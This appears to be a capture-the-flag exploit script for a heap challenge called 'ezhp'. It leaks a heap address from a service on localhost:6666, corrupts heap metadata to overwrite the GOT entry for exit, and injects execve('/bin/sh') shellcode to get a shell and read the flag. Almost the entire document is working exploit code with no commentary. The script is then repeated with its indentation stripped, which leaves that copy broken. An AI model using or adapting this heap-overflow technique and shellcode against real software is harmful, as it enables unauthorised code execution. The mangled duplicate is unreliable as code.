potetisensei/ezhp.py

## ezhp.py
import string
from socket import *
from struct import pack, unpack
from commands import getoutput
from time import sleep, time
from sys import argv, exit

def read_noblock(p, n):
    p.setblocking(False)
    try:
        ret = p.recv(n)
    except:
        ret = ''
    p.setblocking(True)
    return ret

def read_until(p, string):
    s = ""
    while 1:
        c = p.recv(1)
        s += c
        if s[-len(string):] == string:
            return s

def read_n(p, n, timeout=-1):
    s = ""
    start = time()
    while len(s) < n:
        s += read_noblock(p, 1)
        if timeout != -1 and time() - start > timeout:
            return s
    return s

def xor(s1, s2):
    ret = ""
    for i in xrange(len(s1)):
        ret += chr(ord(s1[i]) ^ ord(s2[i%len(s2)]))
    return ret

def wait(m):
    for i in xrange(1, m+1):
        print "{}...".format(i)
        sleep(1)

p = None
def main():
    global p

    exit = 0x0804A010
    shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x54\x59\x50\x5a\x6a\x0b\x58\xcd\x80"

    p = socket(AF_INET, SOCK_STREAM)
    p.connect(("localhost", 6666))

    print read_until(p, "option.\n")
    p.send("1\n")
    p.send("16\n")

    print read_until(p, "option.\n")
    p.send("1\n")
    p.send("16\n")

    print read_until(p, "option.\n")
    p.send("3\n")
    print read_until(p, "id.\n")
    p.send("0\n")
    print read_until(p, "size.\n")
    p.send("28\n")
    print read_until(p, "data.\n")
    p.send("a" * 28)

    print read_until(p, "option.\n")
    p.send("4\n")
    print read_until(p, "id.\n")
    p.send("0\n")
    res = read_until(p, "\nPlease")
    heap = unpack("<I", res[28:-7][4:8])[0]

    print "heap:", hex(heap)
    print "Please" + read_until(p, "option.\n")

    payload = ""
    payload += shellcode
    payload += "aa"
    payload += pack("<I", exit)
    p.send("3\n")
    print read_until(p, "id.\n")
    p.send("0\n")
    print read_until(p, "size.\n")
    p.send("{}\n".format(len(payload)))
    print read_until(p, "data.\n")
    p.send(payload)

    print read_until(p, "option.\n")
    p.send("1\n")
    p.send("{}\n".format(0x08048426-0x30))

    payload = ""
    payload += shellcode
    payload += "aa"
    payload += pack("<I", 0)
    p.send("3\n")
    print read_until(p, "id.\n")
    p.send("0\n")
    print read_until(p, "size.\n")
    p.send("{}\n".format(len(payload)))
    print read_until(p, "data.\n")
    p.send(payload)

    shellcode_addr = heap + 12
    print read_until(p, "option.\n")
    p.send("3\n")
    print read_until(p, "id.\n")
    p.send("2\n")
    print read_until(p, "size.\n")
    p.send("{}\n".format(4))
    print read_until(p, "data.\n")
    p.send(pack("<I", shellcode_addr))

    print read_until(p, "option.\n")
    p.send("1\n")
    print read_until(p, "size.\n")
    p.send("0\n")

    p.send("cat flag\n")
    print [p.recv(1024)]
    print [p.recv(1024)]
    print [p.recv(1024)]
    print [p.recv(1024)]

if __name__ == "__main__":
    main()
	import string
	from socket import *
	from struct import pack, unpack
	from commands import getoutput
	from time import sleep, time
	from sys import argv, exit

	def read_noblock(p, n):
	p.setblocking(False)
	try:
	ret = p.recv(n)
	except:
	ret = ''
	p.setblocking(True)
	return ret

	def read_until(p, string):
	s = ""
	while 1:
	c = p.recv(1)
	s += c
	if s[-len(string):] == string:
	return s

	def read_n(p, n, timeout=-1):
	s = ""
	start = time()
	while len(s) < n:
	s += read_noblock(p, 1)
	if timeout != -1 and time() - start > timeout:
	return s
	return s

	def xor(s1, s2):
	ret = ""
	for i in xrange(len(s1)):
	ret += chr(ord(s1[i]) ^ ord(s2[i%len(s2)]))
	return ret

	def wait(m):
	for i in xrange(1, m+1):
	print "{}...".format(i)
	sleep(1)

	p = None
	def main():
	global p

	exit = 0x0804A010
	shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x54\x59\x50\x5a\x6a\x0b\x58\xcd\x80"

	p = socket(AF_INET, SOCK_STREAM)
	p.connect(("localhost", 6666))

	print read_until(p, "option.\n")
	p.send("1\n")
	p.send("16\n")

	print read_until(p, "option.\n")
	p.send("1\n")
	p.send("16\n")

	print read_until(p, "option.\n")
	p.send("3\n")
	print read_until(p, "id.\n")
	p.send("0\n")
	print read_until(p, "size.\n")
	p.send("28\n")
	print read_until(p, "data.\n")
	p.send("a" * 28)

	print read_until(p, "option.\n")
	p.send("4\n")
	print read_until(p, "id.\n")
	p.send("0\n")
	res = read_until(p, "\nPlease")
	heap = unpack("<I", res[28:-7][4:8])[0]

	print "heap:", hex(heap)
	print "Please" + read_until(p, "option.\n")

	payload = ""
	payload += shellcode
	payload += "aa"
	payload += pack("<I", exit)
	p.send("3\n")
	print read_until(p, "id.\n")
	p.send("0\n")
	print read_until(p, "size.\n")
	p.send("{}\n".format(len(payload)))
	print read_until(p, "data.\n")
	p.send(payload)

	print read_until(p, "option.\n")
	p.send("1\n")
	p.send("{}\n".format(0x08048426-0x30))

	payload = ""
	payload += shellcode
	payload += "aa"
	payload += pack("<I", 0)
	p.send("3\n")
	print read_until(p, "id.\n")
	p.send("0\n")
	print read_until(p, "size.\n")
	p.send("{}\n".format(len(payload)))
	print read_until(p, "data.\n")
	p.send(payload)

	shellcode_addr = heap + 12
	print read_until(p, "option.\n")
	p.send("3\n")
	print read_until(p, "id.\n")
	p.send("2\n")
	print read_until(p, "size.\n")
	p.send("{}\n".format(4))
	print read_until(p, "data.\n")
	p.send(pack("<I", shellcode_addr))

	print read_until(p, "option.\n")
	p.send("1\n")
	print read_until(p, "size.\n")
	p.send("0\n")

	p.send("cat flag\n")
	print [p.recv(1024)]
	print [p.recv(1024)]
	print [p.recv(1024)]
	print [p.recv(1024)]

	if __name__ == "__main__":
	main()